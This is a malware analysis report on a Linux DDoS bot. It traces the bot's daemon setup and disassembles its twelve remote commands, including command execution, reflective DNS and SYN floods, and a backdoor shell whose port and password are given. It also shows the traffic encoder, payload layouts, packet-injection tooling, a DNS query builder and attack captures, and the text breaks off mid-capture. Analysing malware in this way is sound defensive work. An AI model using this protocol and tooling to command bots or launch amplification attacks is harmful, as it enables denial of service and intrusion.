1. Introduction
In this paper, we document our methodology and present our results in
analyzing an unknown binary. Our task is to determine, among other things,
its main functions and features.
A brief overview of the steps that we took is as follows:
- First, we tried to learn as much as possible about the
binary without executing it. This involved applying GNU/Linux
utilities like strings and objdump to the binary. This
way, we got an idea of what to expect when we did execute the binary.
- Then, we executed the binary in a controlled environment
to observe its behavioural characteristics. A controlled environment
prevents the binary from doing unnecessary damage.
- Next, we disassembled the binary to further
determine its full range of functions.
- Finally, we provided external stimuli to the binary by
injecting packets into the network to understand its network behaviour.
Details of our analysis in each of the above steps will be
described in the subsequent sections. We will also be highlighting a
bug that we uncovered in the code. Finally, we will conclude this paper
with some general comments.
2. Tools of the trade
We used both public domain and commercial tools in our analysis.
Besides native GNU/Linux utilities like strings, strace,
gdb, file, objdump, lsof, tcpdump and
ethereal, the following tools deserve special mention:
2.1 IDA Pro
IDA Pro [1] is by far the best code disassembly tool in our opinion.
It supports a myriad of processors and platforms, and has several excellent
features that drastically reduced our code disassembly effort. While
it is not free (the standard edition costs US$299), it is well worth the
money if you need a disassembler to do your job. Perhaps the only
thing to wish for in this particular situation is a version that runs natively
on Linux; a Windows environment is required. This requirement introduces
a minor inconvenience, because the binary in question turns
out to be a Linux ELF executable. This means that we had to juggle between
a Linux machine and a Windows machine.
For those of you who are thinking of trying out IDA Pro in Wine
[2], we can report that we were unable to get either the latest 4.21
version or the freeware version to run in Wine. However, we did
manage to get the older 4.18 version to work with Wine, with the occasional
non-fatal bug. Other versions may work too. Unfortunately, it may be
difficult to get hold of an older version of IDA Pro, because the IDA Pro
website no longer provides them for download. So unless you are a registered
user and keep an older copy around (like us), you may be out of luck
until the compatibility issues get sorted out.
2.2 LibNet
LibNet [3] is a network programming library that aims to provide
a generic interface to network programming, without being tied down to
any particular type of network. LibNet also gives the programmer greater
control over the packet creation process. In the later part of our analysis,
we needed to craft specific network packets that are neither TCP nor UDP as
external stimuli to the binary. We did this easily with LibNet.
3. First Looks
One of the first things we did was to run the strings command
on the binary, probably because it is one of the easiest things to do :-)
Looking through the entire strings
output, we immediately made two interesting observations. Firstly, we
spotted a section of strings that gave some indication as to the nature of
this binary:
[mingetty]
/tmp/.hj237349
/bin/csh -f -c "%s" 1> %s 2>&1
TfOjG
/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin/:.
PATH
HISTFILE
linux
TERM
/bin/sh
/bin/csh -f -c "%s"
%d.%d.%d.%d
%u.%u.%u.%u
%c%s
We can clearly see what looks like:
- a process name
- a temporary storage file name
- some shell commands
- some environment variables
- some IP address format specifiers
- a strange looking string "TfOjG"
At this point, it is difficult to ascertain the exact purpose of
these strings, although one might be able to make intelligent enough guesses.
As it turns out, the purpose of these strings was revealed to us at a
later stage, during the disassembly process. Incidentally, this set of
strings can also be useful as a signature for detecting the binary in
the wild.
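As a rough illustration of the signature idea, the following Python sketch counts how many of the distinctive strings above occur in a file. The function names, the subset of strings chosen and the threshold of 3 are our own assumptions for illustration, not a vetted detection rule.

```python
import sys

# Distinctive strings taken from the strings output above.
SIGNATURE_STRINGS = [
    b"[mingetty]",
    b"/tmp/.hj237349",
    b'/bin/csh -f -c "%s" 1> %s 2>&1',
    b"TfOjG",
]


def count_signature_hits(data: bytes) -> int:
    """Return how many of the signature strings occur in data."""
    return sum(1 for s in SIGNATURE_STRINGS if s in data)


def looks_like_the_binary(data: bytes, threshold: int = 3) -> bool:
    """Heuristic match; the threshold is an arbitrary assumption."""
    return count_signature_hits(data) >= threshold


if __name__ == "__main__":
    # Usage: python scan.py file1 [file2 ...]
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            print(path, looks_like_the_binary(fh.read()))
```

Requiring several strings at once reduces false positives, since a string like "[mingetty]" on its own could plausibly appear in unrelated files.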
The second interesting find was a set of strings that may allude to
the origin of the binary:
@(#) The Linux C library 5.3.12
GCC: (GNU) 2.7.2.l.2
GCC: (GNU) 2.7.2
This combination of gcc and C library versions was prevalent
4 or 5 years ago. Notice that this is also the period in which
Distributed Denial of Service (DDoS) attacks started to rear their ugly head,
led by tools like Tribe Flood Network [4]. It is possible that the binary
originated from around the same era. Of course, it is also possible
that the binary was compiled on a really old Linux distribution, e.g. Red Hat
5.2.
Using the file command, we can see that this is a Linux ELF
binary built for the i386 platform, and that it is statically linked with
symbols and relocation bits stripped. This is bad news, because without symbol
information, the disassembly process will be more difficult.
root:# file the-binary
the-binary: ELF 32-bit LSB executable, Intel 80386, version 1, statically linked, stripped
The objdump command can also be used to derive various information
about an object file. But in this case, we did not learn any useful information
from the `objdump -x` command.
4. Execution in a Controlled Environment
Now that we have a vague idea regarding the nature of the binary,
our next step was to execute it in a controlled environment, to observe
its behavioural characteristics. The questions that we were interested
in answering are:
- What network connections does it open?
- What files does it access?
- What system calls does it make?
- What is its process and memory footprint?
Our "controlled environment" is simply a default installation of a
Red Hat Linux 7.2 Workstation, connected to a network hub. Also hooked
up to this hub is another Red Hat Linux 7.2 Workstation. This second Linux
box functions as a network sniffer: it will pick up any network packet
that the binary emits. The sniffing software we used was the ever-reliable
tcpdump. These two machines are not connected to any other networks.
Fig 1: Testbed setup (IP addresses are for examples only)
Instead of simply executing the binary at the command line, we decided
to run it via the strace command. strace is a GNU/Linux system
utility that runs a specified program, and at the same time intercepts
and displays the system calls that are made by the program as well as the
signals that are received by the program. It is an extremely useful debugging
and instructional tool. When using strace, it is often useful to
use the "-f" switch, to instruct strace to follow forks into child
processes.
Thus, executing `strace -f` with the name of the binary as the
argument, we obtained the following output:
86 execve("./the-binary", ["./the-binary"], [/* 28 vars */]) = 0
86 personality(PER_LINUX) = 0
86 geteuid() = 0
86 sigaction(SIGCHLD, {SIG_IGN}, {SIG_DFL}, 0x4004e928) = 0
86 fork() = 87
86 _exit(0) = ?
87 setsid() = 87
87 sigaction(SIGCHLD, {SIG_IGN}, {SIG_IGN}, 0x80575a8) = 0
87 fork() = 88
87 _exit(0) = ?
88 chdir("/") = 0
88 close(0) = 0
88 close(1) = 0
88 close(2) = 0
88 time(NULL) = 1021725793
88 socket(PF_INET, SOCK_RAW, 0xb /* IPPROTO_??? */) = 0
88 sigaction(SIGHUP, {SIG_IGN}, {SIG_DFL}, 0x4004e928) = 0
88 sigaction(SIGTERM, {SIG_IGN}, {SIG_DFL}, 0x4004e928) = 0
88 sigaction(SIGCHLD, {SIG_IGN}, {SIG_IGN}, 0x80575a8) = 0
88 sigaction(SIGCHLD, {SIG_IGN}, {SIG_IGN}, 0x80575a8) = 0
88 recv(0,
Now things start to get interesting. Let's look at the above system
trace in more detail.
The leftmost column lists the process IDs, or PIDs, of the current
process. The PID of the binary goes through 3 incarnations, i.e. 86, 87
and 88, because of the multiple forks. PID 88 is its final process ID.
First of all, the binary uses the geteuid() function to determine
if it is being executed with root privileges. If it is not (i.e. the
effective user ID is not 0), the binary will exit. This check is necessary
because subsequent actions of the binary, like opening a raw network socket,
require root privileges.
The next few system calls will look confusing to someone who has not
programmed a daemon process in a Unix environment before. The uninitiated
are urged to refer to the Unix Programming FAQ [5]. In particular,
section 1.7 of the FAQ is especially helpful for understanding the initial
behaviour of the binary. Here is an excerpt:
Simply invoking a program in the background isn't really adequate for
these long-running programs; that does not correctly detach the process
from the terminal session that started it. Also, the conventional way of
starting daemons is simply to issue the command manually or from an rc script;
the daemon is expected to put itself into the background.
Here are the steps to become a daemon:
- fork() so the parent can exit, this returns control
to the command line or shell invoking your program. This step is required
so that the new process is guaranteed not to be a process group leader.
The next step, setsid(), fails if you're a process group leader.
- setsid() to become a process group and session group
leader. Since a controlling terminal is associated with a session, and
this new session has not yet acquired a controlling terminal our process
now has no controlling terminal, which is a Good Thing for daemons.
- fork() again so the parent, (the session group leader),
can exit. This means that we, as a non-session group leader, can never
regain a controlling terminal.
- chdir("/") to ensure that our process doesn't keep
any directory in use. Failure to do this could make it so that an administrator
couldn't unmount a filesystem, because it was our current directory.
[Equivalently, we could change to any directory containing files important
to the daemon's operation.]
- umask(0) so that we have complete control over the
permissions of anything we write. We don't know what umask we may have
inherited. [This step is optional]
- close() fds 0, 1, and 2. This releases the standard
in, out, and error we inherited from our parent process. We have no way
of knowing where these fds might have been redirected to. Note that many
daemons use sysconf() to determine the limit _SC_OPEN_MAX.
_SC_OPEN_MAX tells you the maximum open files/process.
Then in a loop, the daemon can close all possible file descriptors. You
have to decide if you need to do this or not. If you think that there
might be file-descriptors open you should close them, since there's a limit
on number of concurrent file descriptors.
- Establish new open descriptors for stdin, stdout and stderr. Even
if you don't plan to use them, it is still a good idea to have them open.
The precise handling of these is a matter of taste; if you have a logfile,
for example, you might wish to open it as stdout or stderr, and open
`/dev/null' as stdin; alternatively, you could open `/dev/console'
as stderr and/or stdout, and `/dev/null' as stdin, or any other
combination that makes sense for your particular daemon.
As we can see now, the binary was merely observing the good programming
etiquette expected of any daemon process, even though steps 5 (umask) and 7
(re-opening the standard descriptors) were skipped; they are not applicable
in this situation.
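The sequence observed in the trace (fork, setsid, fork, chdir, close) can be sketched in Python as follows. This is only our illustration of the generic idiom, not a translation of the binary's code; the function name daemonize is our own, and the SIGCHLD handling seen in the trace is left out for brevity.

```python
import os


def daemonize() -> None:
    """Detach from the terminal with the fork/setsid/fork sequence.

    Only the final (grandchild) process returns from this function.
    """
    if os.fork() > 0:       # first fork: the original process exits (PID 86 in the trace)
        os._exit(0)
    os.setsid()             # new session, hence no controlling terminal
    if os.fork() > 0:       # second fork: the session leader exits (PID 87 in the trace)
        os._exit(0)
    os.chdir("/")           # do not keep any directory in use
    for fd in (0, 1, 2):    # release the inherited stdin, stdout and stderr
        try:
            os.close(fd)
        except OSError:
            pass            # descriptor was already closed
```

As in the binary, the optional umask(0) step and the re-opening of the standard descriptors are omitted here.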
After closing standard in, out and error, the binary obtains the current
time and opens a raw socket of protocol 11 (0xb). According to the official
assigned list of protocol numbers maintained at iana.org [6], protocol 11
is assigned to "Network Voice Protocol", defined in RFC 741 in 1977 [7].
We can safely say that this is now a defunct protocol, at least in the modern
Internet space. So the binary is using a protocol number that is no longer
used for any known purpose.
Then, after setting itself up to ignore the SIGHUP and SIGTERM signals,
it sits quietly on the opened raw socket connection listening for incoming
data.
Using the netstat command, we verified that indeed a raw socket
of protocol 11 (0xB) has been opened and is in a listening state:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
raw 0 0 *:11 *:* 7
We also verified with lsof that the binary did not access
any files on the filesystem up to this stage. Neither did our network
sniffer pick up any network packets emanating from the binary.
There is one additional action taken by the malware that is not apparent
from the strace output. If one were to use the ps command
to list the processes resident on the system at this moment, one would
notice a process that goes by the name "[mingetty]" with a PID of 88. As
we recall, PID 88 is the final PID of the binary. Apparently, the binary
has changed its process name to "[mingetty]".
However, if the top command is executed instead, the process
name shown is still the original name of the malware, i.e. "the-binary".
Clearly, top and ps use different ways to read the process
name. top is the more sophisticated as it relies on the /proc-based
filesystem.
So much for the easy part. Now for the heady stuff...
5. Binary Analysis
We loaded the binary into IDA Pro, which promptly produced a disassembled
code listing. The entire binary is over 200 Kbytes in size. However,
after much study of the disassembled code, we determined that the main daemon
logic occupies only a small portion of the entire binary, specifically
from .text:0x08048134 to .text:0x08048EC5. Most of the remaining code
is standard C library code. So we concentrated our efforts on
this portion of the binary.
The following commented listings are the fruits of our labour, and cover
almost the entire functionality of the daemon:
Listing 1: Main daemon logic code in assembly language
Listing 2: Pseudo-C equivalent of main daemon logic code
All in all, the daemon is programmed with 12 functions, dispatched
by a switch statement. Briefly, these functions are:
- Function 0 is for status query. The information returned
consists of the tuple: 1, 7, attacking child pid, attacking type (if child
pid != 0). The numbers 1 and 7 may be some form of version information,
as they are hardcoded into the binary.
Also, payloadbuf[1] is set to 3, which probably indicates a reply packet,
as opposed to payloadbuf[1] == 2 for traffic from a master to a slave.
- Function 1 sets the reply IP address of the master. There can be
10 possible reply addresses, and a reply may be sent to all 10 of them,
but only 1 should be the real master's IP address. The rest are most likely
decoys. There are 3 possible cases:
  - payloadbuf[2] == 2: all the reply addresses are copied from the
  payload, of which one should be the true IP address of the master.
  - payloadbuf[2] == 0: all the reply addresses are generated randomly
  except the first, which is copied from the payload. This also sets a global
  variable (ctrl_parameter) which causes all future replies to be sent to
  only 1 host, the master.
  - payloadbuf[2] == other values: An index is generated randomly.
  All reply addresses are generated randomly except for the address at the
  particular index generated earlier. This special address is copied from
  the payload and should be the master's IP address.
- Function 2 executes a command specified in the payload and sends
back the output.
- Function 3 starts a single packet reflective DNS query attack.
- Function 4 starts a fragmented IP packets attack.
- Function 5 allows a remote shell to be spawned when a remote telnet
client connects to port 23281 and supplies the password "SeNiF".
- Function 6 executes a command specified in the payload, but does
not send back the output.
- Function 7 terminates an active listening remote shell or an ongoing
attack.
- Function 8 starts a multiple packet reflective DNS query attack.
- Function 9 starts a single packet TCP SYN attack.
- Function 10 starts a multiple packet TCP SYN attack.
- Finally, Function 11 floods a DNS server with DNS queries.
More details will be revealed in the next section when we look at the
network behaviour.
We also noted that the daemon sports a network data encoding process.
All network packets exchanged between the master and the daemon are encoded
in this way. Fortunately for us, the encoder and decoder code was easily
isolated. Furthermore, the algorithm used turned out to be quite simple and
straightforward, so we had no problems translating the encoder and decoder
assembly code into pseudo-C equivalents.
Listing 3: Network data encoder in assembly language
Listing 4: Pseudo-C equivalent of network data encoder
Listing 5: Network data decoder in assembly language
Listing 6: Pseudo-C equivalent of network data decoder
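For readers without the listings at hand, the following Python sketch shows a simple running-sum scheme that reproduces the sample packets in Section 6.2. It is inferred from those captures rather than transcribed from the listings, so treat the constant 23 and the function names as our assumptions; Listings 4 and 6 remain the authoritative description.

```python
KEY = 23  # additive constant inferred from the sample packets (assumption)


def encode(plain: bytes) -> bytes:
    """Each output byte is the plain byte plus the previous output byte plus KEY, modulo 256."""
    out = bytearray()
    prev = 0
    for b in plain:
        prev = (b + prev + KEY) & 0xFF
        out.append(prev)
    return bytes(out)


def decode(encoded: bytes) -> bytes:
    """Inverse of encode: subtract the previous encoded byte and KEY, modulo 256."""
    out = bytearray()
    prev = 0
    for b in encoded:
        out.append((b - prev - KEY) & 0xFF)
        prev = b
    return bytes(out)


if __name__ == "__main__":
    # First ten encoded payload bytes of the Function 1 packet in Section 6.2.1.
    print(decode(bytes.fromhex("173048698098cfed0c2c")).hex())
```

Because each encoded byte depends on the one before it, the payload must be decoded from its first byte onwards; a capture that starts mid-payload cannot be decoded at its first byte.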
6. Network Analysis
6.1 Getting interactive with the binary
In order to study the network behaviour of the binary in closer detail
(it is after all a network daemon), we need to be able to trigger
the binary from the network side by sending it network packets that it can
recognize. From the previous section, we have already figured out the network
encoding algorithm that the daemon and its master use. That enabled us to
write the following set of programs using libnet:
Listing 7: create_payload.c:
This is a single program that can create the necessary payloads to trigger
all 12 functions of the binary. Once the program runs, the user will
receive on-screen instructions to create the necessary payload for a specific
case. The payload will then be written to a file.
Listing 8: encode.c: This is the network
data encoder that encodes the payload so that the binary can decode it.
Listing 9: inject.c: This program injects
the payload into the network.
Listing 10: receive.c: For Functions
0 and 2, the binary will respond with some data packets. This program can
be used to listen for the reply. However, in these cases, the payload for
Function 1 should first be sent to the binary to set the return
address.
So the sequence of commands that we ran for each case is:
- ./create_payload output_file
- cat output_file | ./encode | ./inject -s bogus_source_ip -d the-binary_ip
If a reply is expected, then of course "./receive" must be executed before
the packet injection command.
Please refer to the README file and the source
code in the inject directory for more details.
Now that we are able to trigger the binary externally, let us examine
its network behaviour in detail for each of the 12 functions.
6.2 Network behaviour of the binary
All the network traffic shown below was captured with tcpdump.
6.2.1 Function 1
We need to examine Function 1 first, because it sets the reply IP address
of the master. To illustrate what an encoded packet looks like, the following
is the packet that we send to the binary for this case:
10:14:08.640747 < 99.98.97.96 > 10.0.1.28: ip-proto-11 502 [tos 0x10]
4510 020a 00f2 0000 300b b809 6362 6160
0a00 011c 0201 1730 4869 8098 cfed 0c2c
4d6f 92b6 db01 2850 79a3 cefa 2755 84b4
e517 4a7e b3e9 2058 91cb 0642 7fbd fc3c
7dbf 0246 8bd1 1860 a9f3 3e8a d725 74c4
1567 ba0e 63b9 1068 c11b 76d2 2f8d ec4c
ad0f 72d6 3ba1 0870 d943 ae1a 87f5 64d4
The first 20 bytes are the standard IP header. The next byte (02)
is always 2 for packets sent from a master to the binary. The next
byte is not used. The rest of the packet is the encoded payload.
The corresponding decoded payload is:
0000000 00 02 01 0a 00 01 20 07 08 09 0a 0b 0c 0d 0e 0f
0000020 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f
0000040 20 21 22 23 24 25 26 27 28 29 2a 2b 2c 2d 2e 2f
0000060 30 31 32 33 34 35 36 37 38 39 3a 3b 3c 3d 3e 3f
0000100 40 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f
The first byte is not used. The next byte is 02. We need to subtract
1 from this value to get the function number, which is function 1 in this
instance. This is how the master specifies to the daemon what function to
call. What follows are the parameters to the specified function. These of
course will vary in content from function to function.
In this case, the next byte is 01. For Function 1, we name this byte
ctrl_parameter. It can take the value 0, 2 or any other
value. The next 4 bytes contain the master IP address, which is 10.0.1.32
(0a 00 01 20). The next 36 bytes contain what we call the auxiliary IP
addresses.
When ctrl_parameter is 0, the binary will send its reply to only
one IP, the master IP. When ctrl_parameter is 2, the binary will
send replies to all 10 IPs in the payload, i.e. the master IP and the auxiliary
IPs. When ctrl_parameter is any other value, which is exactly the
case in the above payload, the binary will generate 9 random IPs and send
its reply to the master IP and the 9 random IPs.
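The field layout just described can be summarised with a small Python sketch that splits a decoded Function 1 payload. The function name, dictionary keys and mode descriptions are ours, chosen for illustration; only the offsets come from the description above.

```python
import socket


def parse_function1(payload: bytes) -> dict:
    """Split a decoded Function 1 payload into the fields described above."""
    ctrl_parameter = payload[2]
    if ctrl_parameter == 0:
        reply_mode = "master only"
    elif ctrl_parameter == 2:
        reply_mode = "master and the 9 auxiliary IPs from the payload"
    else:
        reply_mode = "master and 9 randomly generated IPs"
    return {
        "function": payload[1] - 1,                   # command byte minus 1
        "ctrl_parameter": ctrl_parameter,
        "master_ip": socket.inet_ntoa(payload[3:7]),  # 4 bytes after ctrl_parameter
        "auxiliary_ips": [socket.inet_ntoa(payload[i:i + 4])
                          for i in range(7, 43, 4)],  # 36 bytes, i.e. 9 addresses
        "reply_mode": reply_mode,
    }


if __name__ == "__main__":
    # First 43 bytes of the decoded payload shown above.
    sample = bytes.fromhex("0002010a000120") + bytes(range(0x07, 0x2B))
    for key, value in parse_function1(sample).items():
        print(key, value)
```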
6.2.2 Function 0
The following is a status query packet sent to the binary:
10:14:12.300747 < 99.98.97.96 > 10.0.1.28: ip-proto-11 502 [tos 0x10]
4510 020a 00f2 0000 300b b809 6362 6160
0a00 011c 0201 172f 4862 7d99 b6d4 f313
3456 799d c2e8 0f37 608a b5e1 0e3c 6b9b
ccfe 3165 9ad0 073f 78b2 ed29 66a4 e323
64a6 e92d 72b8 ff47 90da 2571 be0c 5bab
fc4e a1f5 4aa0 f74f a802 5db9 1674 d333
94f6 59bd 2288 ef57 c02a 9501 6edc 4bbb
What is more interesting is the way the reply is sent back by the binary:
10:14:12.320747 > 10.0.1.28 > 123.246.85.96: ip-proto-11 478
10:14:12.330747 > 10.0.1.28 > 123.183.40.136: ip-proto-11 478
10:14:12.350747 > 10.0.1.28 > 35.57.172.73: ip-proto-11 478
10:14:12.360747 > 10.0.1.28 > 45.254.84.85: ip-proto-11 478
10:14:12.370747 > 10.0.1.28 > 10.0.1.32: ip-proto-11 478
10:14:12.380747 > 10.0.1.28 > 223.211.200.132: ip-proto-11 478
10:14:12.390747 > 10.0.1.28 > 9.17.242.51: ip-proto-11 478
10:14:12.400747 > 10.0.1.28 > 158.88.202.25: ip-proto-11 478
10:14:12.410747 > 10.0.1.28 > 78.31.122.201: ip-proto-11 478
Notice that an identical payload is sent to 9 destinations. The original
master IP 10.0.1.32 is one of them, and its position among the destinations
was randomly determined when we called Function 1 earlier. Actually
10 destinations should be expected, but because the auxiliary IPs are generated
randomly, one of them happened to be in an invalid IP range and hence was
not sent out by the kernel.
Let's look at one of these reply packets in detail (the payload is the same
for every destination):
10:14:12.330747 > 10.0.1.28 > 123.183.40.136: ip-proto-11 478
4500 01f2 4251 0000 fa0b cd54 0a00 011c
7bb7 2888 0300 172f 4d64 7b84 9bb2 f91b
ea0a 84fd 75ec 0d24 3c6f 88a0 ce14 73ec
8030 fde8 f21c 67d4 6418 f1f0 1664 db7c
4840 65b8 3aec cfe4 2ca8 5940 5eb4 430c
1050 cd88 82bc 37f4 f438 c190 a604 ab9c
d860 3558 ca8c 9f04 bcc8 29e0 ee54 132c
Notice that the first byte after the IP header is now 03. The binary
always sets this byte to 3 in its replies, as opposed
to 2 for packets that it receives. We will examine this in more detail when
we see a reply consisting of multiple packets in Function 2 below.
The first 5 bytes of the decoded payload constitute the reply, and they are
00 01 07 00 00. The first byte is taken from a global variable in the binary,
but appears to be always 0. The next 2 bytes are hardcoded and will always
appear as 01 07 for all packets sent for this case. We suspect that this is
some version information. The 4th byte will be 0 if there is no active attack
(Functions 3, 4, 8, 9, 10, 11) or remote shell (Function 5). If this byte
is 1, then the fifth byte contains the currently active function number +
1. This indicates to the master which function is currently active for this
daemon.
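To make the reply layout concrete, here is a minimal Python sketch that interprets the five decoded status bytes as described above. The function name and dictionary keys are our own, and the second sample in the usage section is a made-up reply for illustration, not a captured one.

```python
def parse_status_reply(decoded: bytes) -> dict:
    """Interpret the first 5 decoded bytes of a Function 0 reply."""
    busy = decoded[3] != 0
    return {
        "version": (decoded[1], decoded[2]),  # hardcoded 01 07
        "busy": busy,                         # attack or remote shell active
        # The fifth byte holds the active function number + 1.
        "active_function": decoded[4] - 1 if busy else None,
    }


if __name__ == "__main__":
    print(parse_status_reply(bytes.fromhex("0001070000")))  # the reply captured above
    print(parse_status_reply(bytes.fromhex("0001070106")))  # hypothetical busy reply
```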
6.2.3 Function 2
In this function, a command is contained in the payload and the binary
will execute the command, then send back the output of the command. In
this case, the command that we specified is "ls -la /\n".
10:14:22.480747 < 99.98.97.96 > 10.0.1.28: ip-proto-11 502 [tos 0x10]
4510 020a 00f2 0000 300b b809 6362 6160
0a00 011c 0201 1731 b43e 75b9 3cb4 eb31
5269 8cb0 d5fb 224a 739d c8f4 214f 7eae
df11 4478 ade3 1a52 8bc5 003c 79b7 f636
77b9 fc40 85cb 125a a3ed 3884 d11f 6ebe
0f61 b408 5db3 0a62 bb15 70cc 2987 e646
a709 6cd0 359b 026a d33d a814 81ef 5ece
The decoded payload is as follows :
0000000 00 03 6c 73 20 2d 6c 61 20 2f 0a 00 0c 0d 0e 0f
0000020 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f
The second byte (03) indicates that it is Function 2. The rest of the payload
up to the first null character contains the command to execute. In this case,
it shows the string "ls -la /\n". The binary executes this command,
and redirects the output to a temporary file "/tmp/.hj237349" first. It then
reads back the content of the file, before encoding the data and subsequently
transmitting it.
As before, the reply is sent to multiple destinations. The difference
is that now, we observed that there are 4 packets sent to each destination.
That is because the binary sends at most 0x190 bytes in the encoded payload
( i.e. max pkt size = 0x190 + 2 + 20 ). If it needs to send more than this
size, it splits up the content into multiple packets. So if we look at
the replies sent to one particular address 123.246.85.96:
10:14:22.720747 > 10.0.1.28 > 123.246.85.96: ip-proto-11 419
4500 01b7 75a0 0000 fa0b 6d29 0a00 011c
7bf6 5560 0354 ...
10:14:23.220747 > 10.0.1.28 > 123.246.85.96: ip-proto-11 410
4500 01ae 4d52 0000 fa0b 9580 0a00 011c
7bf6 5560 0354 ...
10:14:23.720747 > 10.0.1.28 > 123.246.85.96: ip-proto-11 456
4500 01dc 007c 0000 fa0b e228 0a00 011c
7bf6 5560 0354 ...
10:14:24.220747 > 10.0.1.28 > 123.246.85.96: ip-proto-11 489
4500 01fd 028b 0000 fa0b dff8 0a00 011c
7bf6 5560 0354 ...
For all of them, the first byte after the IP header is 03, which as
we noted before, indicates a reply packet back to the master. The next
byte is not in use. The subsequent payload is the encoded output of the
command executed earlier. In our case, it is a directory listing of the
root directory. For each of the above packets, the first 2 bytes of the
payload decode to the following:
6c 03
6c 04
6c 04
6c 04
The first byte is not used. We observed that for multi-packet replies,
the 2nd byte is always 3 for the first packet, and 4 for subsequent packets.
These bytes are probably additional control bytes used for multi-packet replies.
For the rest of the functions, no reply will be sent from the binary
back to the master. For the command packets sent to the binary, the first
22 bytes are similar. Hence we shall look only at the decoded payload portion
from now on.
6.2.4 Function 3
The decoded payload for Function 3 is:
0000000 00 04 01 02 03 04 10 e1 00 61 62 63 00 0d 0e 0f
The second byte indicates Function 3. The next 4 bytes contain the
victim's IP. The next 2 bytes contain the victim's port. The next byte indicates
whether the binary is to use the IP 01 02 03 04 or the hostname 61 62 63
00 ("abc") as the victim.
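The layout of this payload can be expressed as a short Python sketch. The function name and dictionary keys are our own; since the text does not say which flag value selects the hostname, the flag is returned as-is rather than interpreted.

```python
import socket
import struct


def parse_function3(payload: bytes) -> dict:
    """Split a decoded Function 3 payload into its fields."""
    (victim_port,) = struct.unpack("!H", payload[6:8])  # network byte order
    hostname = payload[9:].split(b"\x00", 1)[0].decode("ascii")
    return {
        "function": payload[1] - 1,
        "victim_ip": socket.inet_ntoa(payload[2:6]),
        "victim_port": victim_port,
        "ip_or_hostname_flag": payload[8],  # meaning of each value not interpreted here
        "hostname": hostname,               # NUL-terminated string
    }


if __name__ == "__main__":
    sample = bytes.fromhex("00040102030410e100616263000d0e0f")
    print(parse_function3(sample))
```

The port decodes to 4321 (0x10e1), which is the rwhois port that tcpdump shows as the source port of the resulting queries.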
The response from the binary is as follows :
18:20:52.777481 > 1.2.3.4.rwhois > 157.16.248.3.domain: 5620+ SOA? com. (21)
4500 0031 a200 0000 d011 afa1 0102 0304
9d10 f803 10e1 0035 001d 0000 15f4 0100
0001 0000 0000 0000 0363 6f6d 0000 0600
01
18:20:52.787481 > 1.2.3.4.rwhois > 157.16.251.2.domain: 43161+ SOA? com. (21)
4500 0031 c200 0000 bd11 9fa2 0102 0304
9d10 fb02 10e1 0035 001d 0000 a899 0100
0001 0000 0000 0000 0363 6f6d 0000 0600
01
18:20:52.797481 > 1.2.3.4.rwhois > 157.160.32.12.domain: 61119+ SOA? com. (21)
4500 0031 2e00 0000 ba11 110a 0102 0304
9da0 200c 10e1 0035 001d 0000 eebf 0100
0001 0000 0000 0000 0363 6f6d 0000 0600
01
18:20:52.807481 > 1.2.3.4.rwhois > 157.161.1.2.domain: 4076+ SOA? com. (21)
4500 0031 0b00 0000 a211 6b13 0102 0304
9da1 0102 10e1 0035 001d 0000 0fec 0100
0001 0000 0000 0000 0363 6f6d 0000 0600
01
18:20:52.817481 > 1.2.3.4.rwhois > 157.164.136.8.domain: 42875+ SOA? com. (21)
4500 0031 9d00 0000 9411 6009 0102 0304
9da4 8808 10e1 0035 001d 0000 a77b 0100
0001 0000 0000 0000 0363 6f6d 0000 0600
01
18:20:52.827481 > 1.2.3.4.rwhois > 157.164.136.9.domain: 42651+ SOA? com. (21)
4500 0031 4900 0000 8111 c708 0102 0304
9da4 8809 10e1 0035 001d 0000 a69b 0100
0001 0000 0000 0000 0363 6f6d 0000 0600
01
18:20:52.837481 > 1.2.3.4.rwhois > 157.169.10.1.domain: 20878+ SOA? com. (21)
4500 0031 e700 0000 9511 930b 0102 0304
9da9 0a01 10e1 0035 001d 0000 518e 0100
0001 0000 0000 0000 0363 6f6d 0000 0600
01
We see that the binary sends DNS queries to a preconfigured list of public
DNS servers with the victim's IP address as the source IP. The result is
a reflective DNS query attack on the victim. This form of attack is particularly
potent, because the DNS responses can be significantly larger than the
request, resulting in bandwidth amplification. Refer to CERT Incident Note
IN-2000-04 [8] for more details of this attack.
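The 21-byte DNS message carried in each of these UDP packets is small enough to rebuild by hand. The Python sketch below constructs an SOA query for "com." with a given query ID; it is our reconstruction from the hex dumps above (the function name is ours) and says nothing about how the binary itself assembles the packet.

```python
import struct


def build_soa_query(query_id: int, name: str = "com") -> bytes:
    """Build a DNS query message asking for the SOA record of name."""
    # Header: ID, flags 0x0100 (recursion desired), 1 question, no other records.
    header = struct.pack("!HHHHHH", query_id, 0x0100, 1, 0, 0, 0)
    # QNAME: length-prefixed labels terminated by a zero byte.
    qname = b"".join(
        bytes([len(label)]) + label.encode("ascii")
        for label in name.split(".") if label
    ) + b"\x00"
    # QTYPE 6 = SOA, QCLASS 1 = IN.
    return header + qname + struct.pack("!HH", 6, 1)


if __name__ == "__main__":
    print(build_soa_query(0x15F4).hex())
```

With the query ID 0x15f4 (5620) this yields the same bytes as the DNS portion of the first packet in the capture.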
6.2.5 Function 4
The decoded payload for this function is:
0000000 00 05 00 07 01 02 03 04 05 06 07 08 00 61 62 63
0000020 00
The 2nd byte indicates that it is Function 4. The 3rd byte indicates whether
to use ICMP or UDP, while the 4th byte holds the victim's port if it is
UDP. Interestingly, only 1 byte is allocated for this purpose. Therefore
the port value can only range from 1-255. The next 4 bytes contain the
victim's IP address. Then come 4 bytes for a possibly faked source IP address.
The next byte indicates whether to use the IP 01 02 03 04 or the hostname
61 62 63 00 ("abc") as the victim. The response of the binary is as follows:
18:22:55.593553 < 1.2.3.4 > 10.0.1.28: ip-proto-11 502 [tos 0x10]
4510 020a 00f2 0000 300b 78c6 0102 0304
0a00 011c 0201 1733 4a68 8099 b3ce ea07
2544 5bd3 4cc6 dd05 2e58 83af dc0a 3969
9acc ff33 689e d50d 4680 bbf7 3472 b1f1
3274 b7fb 4086 cd15 5ea8 f33f 8cda 2979
ca1c 6fc3 186e c51d 76d0 2b87 e442 a101
62c4 278b f056 bd25 8ef8 63cf 3caa 1989
18:22:55.613553 > 5.6.7.8 > 1.2.3.4: (frag 1109:9@65520) [tos 0xb2,ECT]
